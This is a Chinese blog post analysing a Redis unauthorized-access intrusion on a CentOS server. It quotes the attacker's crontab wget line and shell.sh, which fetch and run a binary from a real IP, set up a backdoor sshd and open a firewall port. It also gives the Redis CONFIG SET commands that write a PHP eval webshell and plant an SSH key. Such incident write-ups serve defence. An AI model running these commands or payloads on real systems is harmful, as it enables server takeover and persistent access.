入侵事件

最新推荐文章于 2022-11-28 11:54:22 发布
最新推荐文章于 2022-11-28 11:54:22 发布
阅读量1.3k 收藏
点赞数
分类专栏: php 为了忘却 文章标签: centos redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lwx2615/article/details/53172018
版权
1、/etc/crontab文件被修改:
REDIS0006þ^@^@^Gcrackit@T


SHELL=/bin/sh
#* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh



ÿÉ6<95>GþÊN<8c>

2、shell.sh文件:
rm -rf shell.sh
wget -P /tmp http://104.223.72.167:8080/rebot
chmod 777 /bin/rebot
nohup bin/rebot > /tmp/bin/rebot.file 2>&1
rm -rf /etc/crontab
wget -P /etc http://104.223.72.167:8080/crontab
ln -sf /usr/stmp/sshd /tmp/su;/tmp/su -oPort=3307
iptables -I INPUT -p tcp --dport 3307 -i ACCEPT
/etc/rc.d/init.d/iptables save

入侵分析:
首先扫描端口,发现redis的默认服务端口6379,由于某些暴露在外面的redis没有设置密码,这样就可以直接登录。
1.修改crontab文档,这里建立一个tmp下的文档,
CONFIG SET dir /tmp/
CONFIG set dbfilename test.php
SET fuck "<?php @eval($_POST[123]);?>"
save
然后,去tmp目录查看,
ls /tmp/
dump.rdb  hist  hsperfdata_ngx  hsperfdata_root  log  test.php
发现已经生成,打开查看:
REDIS0006þ^@^@^Dfuck^[<?php @eval($_POST[123]);?>ÿ^WÙY©A
p^W

和原来的crontab文档进行对比,发现都有相同的头部:REDIS0006þ^@^@^D
2.crontab定时运行,下载shell文档到tmp下面


还有一个地方需要注意:
root目录下的.ssh/authorized_keys
  打开发现:
     REDIS0006þ^@^@^Gcrackit^G






^@^CqweA<9f>

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm8glBB05kyIgRXCs8WuRwV5zLVU0LjzL1eFl70hIj0/raIl1RxCMrm6u7+fLjxEgoaCiuoNrL+gb+9Z6uBPhIdF3Q61WLuNB/nQ83S3o3d6gW9urkYU3/jKO1y7RZ+E/3u5GNrFsdMl4xaLatjcj7KSU6WJo4c90OSu0RhzZLS2jWKOLiWF3JSwoKTXouAfcDebhyt97D/HF/mZsIIG9wZVVZVoqFpm/RSZvsYvDdICy8hk3osVXW5rSw0vpB9uWBSQBfiJ5/eKZBeKSkJE8s3T75/NFrrr0n6A3h7fODsjUTIOYjOcFqAyrzdBG59eo441MaqB4nThGk+007IACZw== root@dedi10243.hostsailor.com


ÿÛ6·3ëTDß



又是典型的redis文件的格式!
在ssh的目录下面还发现了其它遗留的文件:


在/etc/ssh下也有相关的文档:
authorized_keys  ssh_config   ssh_host_dsa_key      ssh_host_key      ssh_host_rsa_key
moduli           sshd_config  ssh_host_dsa_key.pub  ssh_host_key.pub  ssh_host_rsa_key.pub
vi authorized_keys
发现:
REDIS0006þ^@^@^S1601251638050293014


lwx2615
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis命令介绍之列表的操作命令(第一部分)
Ghosind
07-04 622
介绍并以示例的形式展示Redis中列表相关命令(第一部分),包括LPUSH、LPOP、LLEN、LRANGE、LINDEX等命令。
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
最新发布
guijianchouxyz的博客
11-25 876
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
实战复盘:内网环境入侵ms-SQL数据库
sfeiyan2的博客
08-29 1501
web服务器、ms-SQL服务器、PC客户端在同一个网络中,是一种危险的网络结构,入侵ms-SQL服务器,非常容易
[ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上
awueu25069的博客
04-14 122
一、缘由:   突然有一天某台服务器远程登陆不上,试了好几个人的账号都行,顿时慌了,感觉服务器被黑。在终于找到一个还在登陆状态的同事后,经查看/ect/passwd 和/etc/passwd-异常,文件中的账户都被删除,且第一行加上了REDIS0006,还有莫名其妙的账户加入,google之后确认redis漏洞被利用,服务器被攻破。 二、解决办法:     最好有一个漏扫工具...
数据库安全,如何防止数据库被入侵
dexun123的博客
11-28 1333
3、数据库的3306端口:数据库端口大部分小伙伴都是默认的,如果对外开发也很容易被爆破,这个时候一定要对相关的数据库端口做安全策略,限制对外开放,或者使用phpmyadmin对数据库进行管理等操作,网站的数据库调用账户使用普通权限账户,只有读写,增加删除等操作。最近很多小伙伴都反应自己的游戏、网站数据库遭到了不同程序的入侵,轻者被篡改数据,严重者数据库数据被全部删除,还有的小伙伴甚至被勒索,那么数据库攻击都有哪些,我们该如何预防数据库被入侵呢?常见的数据库攻击一般有。
基于ARMA建模与Sigmoid拟合的光纤周界安防入侵事件识别
02-21
在实际的光纤周界安防系统中,既要求判断入侵事件类别,又要求对各类事件发生的可能性做出全面评估。对此提出一种基于自回归滑动平均(ARMA)建模与Sigmoid概率拟合的入侵事件识别方法。在判断入侵事件类别方面,将光纤...
基于Richer子波神经网络的入侵事件识别方法.pdf
09-25
本文介绍了一种基于Richer子波神经网络的入侵事件识别方法,主要应用于挖掘和人步行事件的分类。传统的入侵事件识别方法依赖于精确的信号特征提取,但这种方法的模型泛化能力较弱。相比之下,神经网络尤其是深度学习...
计算机入侵取证中的入侵事件重构技术研究
05-14
【计算机入侵取证与入侵事件重构】是网络安全领域的重要研究方向,其主要目的是通过收集和分析计算机系统的证据,重建攻击事件的全过程,以便于理解和防止未来的安全威胁。在计算机安全领域,由于证据的易删改性、易...
入侵事件的高效发现、分析与取证_--基于SOAPA架构的智能安全平台.pdf
08-08
目录 安全之困 脱困之道 智能安全平台
入侵检测系统
04-09
入侵检测系统(Intrusion Detection System,简称IDS)是网络安全防护的重要组成部分,它通过实时监控网络或系统活动,分析异常行为,以便及时发现并响应可能的攻击或入侵事件。 IDS通常分为两种类型:基于主机的IDS...
入侵html数据库,教你如何暴库(网站入侵)
weixin_39831104的博客
06-05 3307
教你如何暴库(网站入侵)整理一些暴库知识原理:一、方式暴库的方式有多种多样,我知道的就有3种以上,常见的暴的方法有:%5c类暴,conn.asp暴,ddos暴等等二、原理"%5c"暴库法,它不是网页本身的漏洞,而是利用了IIS解码方式中的一个特性,如果IIS安全设置不周全,而网页设计者未考虑IIS错误,就会被人利用。为何要用"%5c"?它实际上是"\"的十六进制代码,也就是"\"的另一种表示法。在...
linux 系统被入侵之后你要做什么
CoLiuRs
06-03 2105
linux系统的服务器被入侵,总结了以下的基本方法 首先先用iptra(http://os.51cto.com/art/201505/476216.htm)f查下,如果没装的运行yum install iptraf装下,看里面是不是UDP包发的很多,如果是,基本都被人装了后门   1. 检查帐户 # less /etc/passwd # grep :0: /etc
有人入侵,帮忙分析下代码啥意思
yaoliao2012的博客
01-03 528
突然发现文件夹中多了个.asp  里边是这样的代码:  39 then:f.attributes = 39:end if%> 大侠们帮着看看具体啥意思,以后怎么防范他们用这种方法呢?相当郁闷了,百度收录有40万呢,今儿一早变1了,就一主页搜蓝岭香柏网能出来一个,别的全被删了。熟seo的有没有有方法的,被删了还能回来不?
成功处理挖矿病毒劫持,crontab注入顽固脚本,cpu、内存飙升
yan_dk的专栏
08-30 2119
本人的linux centos服务器被挖矿病毒劫持有几个月了,crontab 顽固脚本一直占用,删除也删除不了,cpu、内存一直被长期占用,真是非常痛苦。最近花了几天时间研究,终于成功处理了。cpu、内存也平稳运行了,心情轻松了很多。 有需要技术支持解决问题的朋友,可以联系我。 手机:18034263356 ...
实操教程:黑客如何瞄准和入侵网站的
jklbnm12的博客
06-27 4787
这个问题的答案可能很难确定,仅仅是因为有很多方法可以入侵一个网站。我们在本文中的目的是向您展示黑客在定位和入侵您的网站时最常用的技术! 假设这是您的站点:hack-test.com 让我们ping这个站点来获取服务器IP: 现在我们有 173.236.138.113 - 这是我们的目标站点托管的服务器 IP。 要查找托管在同一服务器上的其他站点,我们将使用 sameip.org: 托管在 IP 地址 173.236.138.113 上的相同 IP 26 站点 ID 领域 网站链接 我们需要有关您网站的更多
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2842
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
『安全工具』注入神器SQLMAP
weixin_33858485的博客
11-27 3825
原文:『安全工具』注入神器SQLMAP          Pic by Baidu 0x 00 前言     正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来....     PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器   0x 01 注入原理 *******************************...
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1253
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; foo.txt# re...
防范网站数据库入侵
Eliakwu的专栏
01-05 663
搜狐、163、雅虎等都是众网民经常光顾的大型门户网站,这些网站提供的搜索引擎服务最受大家的青睐。可是恰恰是这些搜索引擎为黑客大开方便之门,许多黑客可以利用搜索引擎很容易地得到一个网站的数据库,从而得到网站的管理账号和密码,并可以控制到整个网站的管理权。这样一来,一些保存在数据库里只有管理员才能看到的机密文件就被泄露出来。  其实通过搜索引擎入侵网站过程十分简单,了解了入侵的方法,也就可以知道如
某天运维人员,发现百香果集团分公司某服务器中存在可疑账户,于是开始了应急响应排查工作。 操作系统:ubuntu-16.04 事件类型:系统入侵事件 操作系统口令:root/root 进行护网
07-15
针对这个系统入侵事件以及操作系统口令的安全问题,以下是一些护网的建议步骤: 1. 紧急处理:首先,立即修改操作系统的口令,将其更改为复杂且不易被猜测的密码。确保只有授权人员知晓新密码,并通知他们及时更新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值